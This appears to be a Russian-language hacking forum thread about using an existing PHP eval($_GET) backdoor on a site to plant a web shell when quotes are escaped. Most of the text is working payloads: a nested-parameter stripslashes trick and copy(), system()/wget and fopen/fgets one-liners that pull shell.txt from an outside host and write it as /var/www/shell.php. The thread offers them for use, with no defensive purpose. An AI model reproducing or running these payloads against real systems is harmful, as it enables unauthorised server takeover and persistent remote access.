Есть одна уязвимость, точнее Бэкдор в одном скрипте PHP: eval ($_GET['q']); Хочу залить на сайт шелл, проблема в том, что кавычки в параметрах $_GET экранизируется, поэтому ничего не выходит
Пока ждал ответа мысль сама пришла в голову Если кому интересно, то вот мой вариант index.php?q=$_GET[q2]=stripslashes($_GET[q2]);eval($_GET[q2]);&q2=copy("http://site.ru/shell.txt","shell.php");
Code: <?php eval(stripslashes($_REQUEST[cmd])); ?> или Code: <?php assert(stripslashes($_REQUEST[cmd])); ?> Code: cmd=copy('http://site.ru/shell.txt','/var/www/shell.php'); Без stripslashes Code: <?php eval($_REQUEST[cmd]); ?> Code: cmd=copy($_REQUEST[a],$_REQUEST[b]);&a=http://site.ru/shell.txt&b=/var/www/shell.php Через wget, curl, fetch и другие качалки Code: <?php system($_REQUEST[cmd]); ?> Code: cmd=wget http://site.ru/shell.txt -O /var/www/shell.php Ну, а если, все таки, очень хочется по извращаться Code: eval($_REQUEST[cmd]); Code: cmd=$a=fopen($_REQUEST[b],$_REQUEST[bb]);$b=fopen($_REQUEST[c],$_REQUEST[cc]);while(!feof($a)){$res=fgets($a);fputs($b,$res);}&bb=b&cc=w+&b=http://site.ru/shell.txt&c=/var/www/shell.php
Redwood, видимо, он править не имеет возможности скрипт, поэтому юзать только может eval ($_GET['q']); (то, что какой-то хацкер прописал до него)